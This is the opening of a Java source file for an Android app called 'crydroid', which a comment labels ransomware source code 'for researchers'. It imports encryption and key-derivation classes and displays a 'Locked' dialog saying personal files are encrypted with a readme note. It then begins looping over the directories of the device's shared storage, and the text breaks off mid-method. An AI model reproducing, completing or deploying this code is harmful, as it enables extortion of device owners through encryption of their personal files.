package com.crydroid;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.security.AlgorithmParameters;
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import java.security.spec.KeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import android.app.AlertDialog;
import android.content.pm.PackageManager;
import android.app.Activity;
import android.support.v4.app.ActivityCompat;
import android.support.v4.content.ContextCompat;
import java.io.File;
import android.annotation.SuppressLint;
import android.os.Bundle;
import android.os.StrictMode;
import org.apache.commons.io.FilenameUtils;
import java.util.List;
import org.apache.commons.io.FileUtils;
import org.apache.commons.io.filefilter.TrueFileFilter;
import org.apache.commons.lang3.ArrayUtils;

// Android Ransomware source code for researchers
// This code was sent to virustotal to prevent it from being used for malicious purposes
// written by: github.com/thelinuxchoice/crydroid
 
@SuppressLint("NewApi")
public class MainActivity extends Activity
  {
@Override
protected void onCreate(Bundle savedInstanceState)
{
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    StrictMode.ThreadPolicy policy=new StrictMode.ThreadPolicy.Builder().permitAll().build();
    StrictMode.setThreadPolicy(policy);

        try {
checkperm();
        } catch (Exception e) {
        }
}

private AlertDialog alert;
 
private void dialog_message() {
    AlertDialog.Builder builder = new AlertDialog.Builder(this);
    builder.setTitle("Locked");
    builder.setMessage("Personal files encrypted, see readme_now.txt");
    alert = builder.create();
    alert.show();
}

public void writemessage() throws Exception  {

for (File f : new File("/storage/emulated/0").listFiles()) {
    if (f.isDirectory()) {
String path1 = f.getCanonicalPath();


